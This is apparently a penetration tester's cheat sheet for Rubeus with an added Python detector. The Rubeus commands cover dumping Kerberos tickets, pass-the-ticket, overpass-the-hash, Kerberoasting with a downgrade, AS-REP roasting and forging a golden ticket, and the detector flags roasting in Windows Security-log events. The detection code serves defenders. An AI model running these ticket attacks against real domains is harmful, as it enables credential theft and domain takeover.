Rubeus
Rubeus (3.8k ⭐) is a Windows tool to interact with Kerberos and manipulate tickets.
PS> .\Rubeus.exe dump /nowrap # Dump tickets
Request and load a ticket in the current session:
PS> # Load the ticket in the current session
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /ptt
PS> .\Rubeus.exe asktgt /user:xxx$ /certificate:[...] /ptt
Pass the hash:
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>
Pass the Key / OverPass the Hash (create a ticket):
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>
PS> # Pass the Key / OverPass the Hash == create a ticket
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /aes256:xxx /nowrap
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /nowrap
Kerberoasting
PS> .\Rubeus.exe kerberoast /user:cn /nowrap # Request
PS> .\Rubeus.exe kerberoast /domain:dev.example.com /user:cn /nowrap
PS> .\Rubeus.exe kerberoast /stats # number of SPNs, encryption types
PS> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
PS> .\Rubeus.exe kerberoast /user:cn /nowrap # cn encryption settings
PS> .\Rubeus.exe kerberoast /tgtdeleg /ldapfilter:'admincount=1' /nowrap # try a downgrade attack
AS-REP roasting
PS> .\Rubeus.exe asreproast /user:cn /nowrap /format:hashcat
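Detection side of the Kerberoasting and AS-REP roasting requests above, as an added example that is not part of the original notes: it scans Security-log events 4769 and 4768 for RC4 (0x17) service tickets and for TGT requests made without pre-authentication. The event records, account names, IP addresses and the burst threshold are constructed for illustration.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23; AES128/AES256 are 0x11/0x12

def tgs(user, svc, etype, ip):  # 4769: a Kerberos service ticket was requested
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip}

def tgt(user, preauth, ip):     # 4768: a Kerberos TGT was requested
    return {"EventID": 4768, "TargetUserName": user, "PreAuthType": preauth, "IpAddress": ip}

# Constructed sample records, shaped like Security-log events exported to JSON.
SAMPLE_EVENTS = [
    tgs("alice@DEV.EXAMPLE.COM", "svc_sql", "0x17", "::ffff:10.0.0.50"),
    tgs("alice@DEV.EXAMPLE.COM", "svc_web", "0x17", "::ffff:10.0.0.50"),
    tgs("alice@DEV.EXAMPLE.COM", "svc_backup", "0x17", "::ffff:10.0.0.50"),
    tgs("bob@DEV.EXAMPLE.COM", "svc_sql", "0x12", "::ffff:10.0.0.51"),         # AES256: ignored
    tgs("carol@DEV.EXAMPLE.COM", "WS01$", "0x17", "::ffff:10.0.0.52"),         # computer account
    tgs("dave@DEV.EXAMPLE.COM", "svc_legacy", "0x17", "::ffff:10.0.0.61"),
    tgs("erin@DEV.EXAMPLE.COM", "svc_sql", "0xFFFFFFFF", "::ffff:10.0.0.62"),  # failed request
    tgt("svc_old", "0", "::ffff:10.0.0.50"),  # PreAuthType 0: no pre-authentication
    tgt("bob", "2", "::ffff:10.0.0.51"),      # PreAuthType 2: encrypted timestamp, normal
]

def find_roasting(events, burst=3):
    """Return findings as (kind, account, client_ip, services) tuples."""
    rc4 = defaultdict(set)  # (requesting user, client ip) -> services asked for with RC4
    findings = []
    for ev in events:
        if ev.get("EventID") == 4769:
            svc = ev.get("ServiceName", "")
            etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
            # Computer accounts ($) and krbtgt have random keys; skip them to cut noise.
            if etype == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
                rc4[(ev["TargetUserName"], ev["IpAddress"])].add(svc)
        elif ev.get("EventID") == 4768 and str(ev.get("PreAuthType")) == "0":
            findings.append(("asrep-no-preauth", ev["TargetUserName"], ev["IpAddress"], []))
    for (user, ip), services in sorted(rc4.items()):
        # One client asking for RC4 tickets to many services is the stronger signal.
        kind = "rc4-tgs-burst" if len(services) >= burst else "rc4-tgs"
        findings.append((kind, user, ip, sorted(services)))
    return findings

if __name__ == "__main__":
    for finding in find_roasting(SAMPLE_EVENTS):
        print(finding)
```

Single `rc4-tgs` hits need a baseline, since legacy services that only support RC4 produce them legitimately.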
👻 To-do 👻
Stuff that I found but have not read/used yet.
Cannot be compiled on Linux.
$ DEST="$HOME/tools/rubeus"
$ git clone -b master https://github.com/GhostPack/Rubeus "$DEST"
$ # need .NET Framework v4.0 Developer Packs at https://aka.ms/msbuild/developerpacks
Golden ticket:
PS> .\Rubeus.exe golden /rc4:<krbtgt hash> /domain:dev.example.com /sid:<child domain SID> /sids:<target domain SID> /user:dummy /ptt